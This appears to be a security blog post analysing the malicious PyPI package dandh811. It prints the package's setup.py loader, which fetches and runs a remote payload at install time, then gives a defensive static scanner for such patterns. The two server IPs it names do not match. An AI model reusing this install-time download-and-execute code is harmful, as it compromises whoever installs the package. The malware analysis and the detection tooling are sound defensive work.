Our static analysis module flagged package dandh811==0.0.10 as suspicious. So we decided to take a deeper look at the code, particularly the statements that were flagged by our technology as "risky". Upon further review we found that the package is indeed fishy! Here we discuss our findings.
Our technology-generated report shows that the package:
- homepage redirects to injection.vip,
- uses subprocess APIs in setup.py.
As setup.py contains code that is executed immediately upon installation of a package, it is clear that the package is trying to download a malicious payload from a remote server.
```python
import subprocess
import urllib2

# Fetch the second-stage payload over plain HTTP at install time.
handler = urllib2.urlopen("http://126.96.36.199/sectest/package/pypi/download")
# Persist it to a world-writable location...
with open("/tmp/dandh811.py", "wb") as fp:
    fp.write(handler.read())
# ...and run it with a separate Python 2 interpreter.
subprocess.call(["python2", "/tmp/dandh811.py"])
```
Fig 1 above shows an excerpt from the setup.py file. As seen, it first downloads a malicious payload from sectest/package/pypi/download over an insecure HTTP channel. The payload is saved as /tmp/dandh811.py and executed as a background process during installation.
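The install-time pattern described above (remote fetch, write to /tmp, spawn an interpreter) is exactly what a static check over setup.py can catch before the package is ever installed. The following is an added example, not code from the original post or from the analysis tooling it mentions: it parses a setup.py with Python's `ast` module, resolves import aliases, and flags network calls, process-spawning calls, plaintext `http://` URLs and `/tmp/` paths. The sample setup.py embedded below is constructed to mirror the excerpt in Fig 1; its IP address is a TEST-NET placeholder, not the real server.

```python
import ast

# Constructed sample setup.py mirroring the pattern in Fig 1 (not the
# package's actual file; the IP is a TEST-NET placeholder, not the real server).
SAMPLE_SETUP_PY = '''
import subprocess
import urllib2
from setuptools import setup

handler = urllib2.urlopen("http://203.0.113.10/sectest/package/pypi/download")
with open("/tmp/dandh811.py", "wb") as fp:
    fp.write(handler.read())
subprocess.call(["python2", "/tmp/dandh811.py"])

setup(name="dandh811", version="0.0.10")
'''

# (module, function) pairs that fetch remote content or spawn processes.
NETWORK_FUNCS = {
    ("urllib2", "urlopen"), ("urllib.request", "urlopen"),
    ("urllib.request", "urlretrieve"), ("requests", "get"),
}
EXEC_FUNCS = {
    ("subprocess", "call"), ("subprocess", "Popen"), ("subprocess", "run"),
    ("subprocess", "check_output"), ("os", "system"), ("os", "popen"),
}


def _dotted_name(node):
    """Turn an Attribute/Name chain such as a.b.c into the string 'a.b.c'."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def _import_aliases(tree):
    """Map local names to what they import, so `import x as y` and
    `from x import f` still resolve to a (module, function) pair."""
    aliases = {}
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            for a in node.names:
                aliases[a.asname or a.name] = (a.name, None)
        elif isinstance(node, ast.ImportFrom) and node.module:
            for a in node.names:
                aliases[a.asname or a.name] = (node.module, a.name)
    return aliases


def _call_target(func_node, aliases):
    """Resolve a call's callee to a (module, function) pair."""
    name = _dotted_name(func_node)
    if name is None:
        return None
    mod, _, func = name.rpartition(".")
    if mod:
        head, _, tail = mod.partition(".")
        real_head = aliases.get(head, (head, None))[0]
        return (real_head + ("." + tail if tail else ""), func)
    if func in aliases and aliases[func][1] is not None:
        return aliases[func]
    return ("", func)


def assess_setup_py(source):
    """Statically flag install-time download-and-execute behaviour.
    Returns a verdict plus sorted (line, category, detail) findings."""
    tree = ast.parse(source)
    aliases = _import_aliases(tree)
    findings = []
    for node in ast.walk(tree):
        if isinstance(node, ast.Call):
            target = _call_target(node.func, aliases)
            if target in NETWORK_FUNCS:
                findings.append((node.lineno, "network", ".".join(target)))
            elif target in EXEC_FUNCS:
                findings.append((node.lineno, "exec", ".".join(target)))
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            if node.value.startswith("http://"):
                findings.append((node.lineno, "plaintext-url", node.value))
            elif node.value.startswith("/tmp/"):
                findings.append((node.lineno, "tmp-path", node.value))
    categories = {cat for _, cat, _ in findings}
    if {"network", "exec"} <= categories:
        verdict = "download-and-execute"
    elif findings:
        verdict = "suspicious"
    else:
        verdict = "clean"
    return {"verdict": verdict, "findings": sorted(findings)}


if __name__ == "__main__":
    report = assess_setup_py(SAMPLE_SETUP_PY)
    print(report["verdict"])
    for line, category, detail in report["findings"]:
        print(f"  line {line}: {category}: {detail}")
```

The verdict escalates to "download-and-execute" only when both a network fetch and a process spawn appear in the same setup.py, which keeps ordinary packages that merely call `subprocess` for a build step in the "suspicious" bucket for manual review rather than auto-blocking them. Alias resolution matters in practice because `from subprocess import call` or `import urllib2 as u` would otherwise slip past a naive string match on `subprocess.call`.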
We tried downloading the payload manually from 188.8.131.52, but the server was not reachable. ipinfo.io shows that this server is located in China.
We reported our findings to the PyPI maintainers, and they yanked this package as of January 2022.